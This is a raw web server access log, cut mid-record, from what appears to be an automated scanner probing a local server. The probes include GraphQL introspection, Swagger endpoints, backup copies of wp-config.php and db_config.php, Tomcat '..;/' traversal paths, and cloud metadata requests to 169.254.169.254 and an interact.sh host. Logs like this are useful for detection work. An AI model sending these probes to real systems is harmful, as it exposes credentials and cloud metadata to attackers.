}}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphql-explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:39 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:39 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphql/console HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:39 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphql/schema.json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:39 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphql/schema.xml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:39 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphql/schema.yaml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:39 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:39 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/subscriptions HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:39 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/altair HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:39 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/api/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /examples/websocket/index.xhtml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.093","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:39 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..;/examples/servlets/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:39 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graph HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..;/examples/jsp/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:39 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphiql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..;/examples/websocket/index.xhtml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"169.254.169.254","request":"GET http://169.254.169.254/latest/meta-data/ HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.736","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /db_config.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.093","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /404.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-login.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_swagger_/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.100","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/swagger-ui/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/swagger-ui/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger-resources/restservices/v2/api-docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config-sample.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.108","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:40 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphiql.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.067","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger_doc.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.043","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.inc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.041","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.old HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:41 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphiql.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.037","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:41 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphiql.min.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:41 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphiql.min.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:41 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphiql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:41 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphiql/finland HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:41 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:41 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphql-explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.050","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.php.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.php.old HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.php.dist HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:42 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.052","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:42 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphql/console HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.php.inc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:43 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphql/schema.json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.036","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.php.swp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:44 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphql/schema.xml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:44 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphql/schema.yaml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:44 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:44 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/subscriptions HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.php.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.040","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config-backup.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.php.save HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.php~ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.php-backup HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.php.orig HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.php.original HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_wpeprivate/config.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"169.254.169.254","request":"GET http://169.254.169.254/v1/metadata/private-networks HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"14.377","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"aws.interact.sh","request":"GET http://aws.interact.sh/v1/metadata/private-networks HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"19.379","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"169.254.169.254","request":"GET http://169.254.169.254/metadata/v1.json HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"14.940","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} 